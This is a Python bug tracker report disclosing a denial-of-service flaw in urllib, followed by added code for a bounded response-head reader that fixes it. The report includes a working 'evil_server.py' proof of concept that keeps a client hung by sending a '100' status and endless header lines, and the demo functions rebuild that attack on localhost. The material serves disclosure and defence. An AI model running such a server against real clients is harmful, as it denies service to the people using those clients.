New submission from guangli dong <leve...@gmail.com>:
If a client requests an http/https/ftp service which is controlled by an attacker, the attacker can make this client hang forever, even if the client has set the "timeout" argument. Maybe this client will also consume more and more memory; I have not tested this conclusion.

client.py

```
import urllib.request

req = urllib.request.Request('http://127.0.0.1:8085')
response = urllib.request.urlopen(req, timeout=1)
```

evil_server.py

```
# coding:utf-8
from socket import *
from multiprocessing import *
from time import sleep


def dealWithClient(newSocket, destAddr):
    # Read the request, answer with an interim "100" status line, then keep
    # streaming header lines without ever sending the blank line that ends them.
    recvData = newSocket.recv(1024)
    newSocket.send(b"""HTTP/1.1 100 OK\n""")
    while True:
        # recvData = newSocket.recv(1024)
        newSocket.send(b"""x:a\n""")
        if len(recvData) > 0:
            # print('recv[%s]:%s' % (str(destAddr), recvData))
            pass
        else:
            print('[%s]close' % str(destAddr))
            sleep(10)
            print('over')
            break
    # newSocket.close()


def main():
    serSocket = socket(AF_INET, SOCK_STREAM)
    serSocket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
    localAddr = ('', 8085)
    serSocket.bind(localAddr)
    serSocket.listen(5)
    try:
        while True:
            # One child process per accepted connection.
            newSocket, destAddr = serSocket.accept()
            client = Process(target=dealWithClient, args=(newSocket, destAddr))
            client.start()
            newSocket.close()
    finally:
        serSocket.close()


if __name__ == '__main__':
    main()
```

----------
components: Library (Lib)
messages: 392825
nosy: leveryd
priority: normal
severity: normal
status: open
title: "urllib" will result to deny of service
type: security
versions: Python 3.7

_______________________________________
Python tracker <rep...@bugs.python.org>
<https://bugs.python.org/issue44022>
_______________________________________
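The root of the hang described above is that a per-operation socket timeout only bounds each individual recv; a server that keeps sending header lines fast enough never trips it, and nothing caps how many lines the client will accept. As an added example (not code from the report, from CPython, or from any project), here is a response-head reader that closes both gaps: it re-arms the socket timeout from an overall wall-clock deadline before every read and refuses more than a fixed number of header lines (100 here, the same order of magnitude as the `_MAXHEADERS` limit http.client applies to ordinary headers). The two `demo_*` functions talk to constructed local servers started in a thread; the ports, payloads and limits are assumptions for the demonstration only.

```python
import socket
import threading
import time


class ResponseHeadError(Exception):
    """Raised when the response head exceeds one of the configured limits."""


def _readline(sock, buf, deadline, max_line):
    """Return one line from sock; buf is the bytearray carry-over.  The socket
    timeout is re-armed before every recv with the time left until the deadline."""
    while b"\n" not in buf:
        if len(buf) > max_line:
            raise ResponseHeadError("header line longer than %d bytes" % max_line)
        remaining = deadline - time.monotonic()
        if remaining <= 0:
            raise ResponseHeadError("overall deadline exceeded")
        sock.settimeout(remaining)
        chunk = sock.recv(4096)
        if not chunk:
            raise ResponseHeadError("peer closed connection before end of headers")
        buf += chunk
    end = buf.index(b"\n") + 1
    line = bytes(buf[:end])
    del buf[:end]
    return line


def read_response_head(sock, total_timeout=5.0, max_header_lines=100, max_line=65536):
    """Read status line plus headers, skipping 1xx interim responses, under a
    wall-clock deadline and a cap on header lines; returns (status, headers, rest)."""
    deadline = time.monotonic() + total_timeout
    buf = bytearray()
    while True:
        parts = _readline(sock, buf, deadline, max_line).split(None, 2)
        if len(parts) < 2 or not parts[1].isdigit():
            raise ResponseHeadError("malformed status line")
        status = int(parts[1])
        headers = []
        while True:
            line = _readline(sock, buf, deadline, max_line)
            if line in (b"\r\n", b"\n"):
                break
            headers.append(line.rstrip(b"\r\n"))
            if len(headers) > max_header_lines:
                raise ResponseHeadError("more than %d header lines" % max_header_lines)
        if 100 <= status < 200:
            continue  # interim response: discard it; the deadline bounds repeats
        return status, headers, bytes(buf)  # leftover bytes belong to the body


def _serve_once(payload, repeat_last):
    """Constructed local server for the demo: send the payload chunks to one client
    and, if repeat_last, resend the last chunk until the client hangs up."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def run():
        with srv, srv.accept()[0] as conn:
            try:
                for chunk in payload:
                    conn.sendall(chunk)
                while repeat_last:
                    conn.sendall(payload[-1])
            except OSError:
                pass  # the client gave up and closed the connection

    threading.Thread(target=run, daemon=True).start()
    return srv.getsockname()[1]


def fetch_head(port, total_timeout=5.0):
    sock = socket.create_connection(("127.0.0.1", port), timeout=total_timeout)
    try:
        sock.sendall(b"GET / HTTP/1.1\r\nHost: 127.0.0.1\r\n\r\n")
        return read_response_head(sock, total_timeout=total_timeout)
    finally:
        sock.close()


def demo_endless_interim_headers():
    """'100 OK' then 'x:a' forever, as in the report: returns (error, seconds)."""
    port = _serve_once([b"HTTP/1.1 100 OK\n", b"x:a\n"], repeat_last=True)
    start = time.monotonic()
    try:
        fetch_head(port)
    except ResponseHeadError as exc:
        return str(exc), time.monotonic() - start
    return None, time.monotonic() - start


def demo_well_formed():
    """A 100 Continue followed by a proper 200 response: returns (status, headers)."""
    port = _serve_once([b"HTTP/1.1 100 Continue\r\n\r\n",
                        b"HTTP/1.1 200 OK\r\nContent-Length: 2\r\n\r\nok"], False)
    return fetch_head(port)[:2]
```

Against the endless `x:a` stream, `demo_endless_interim_headers()` returns within milliseconds with "more than 100 header lines", and memory stays bounded because the carry-over buffer is trimmed after every line and capped by `max_line`. A server that instead repeats interim status lines forever is cut off by the deadline. `demo_well_formed()` shows the normal path still works: the interim `100 Continue` is skipped and the final `200` with its headers is returned.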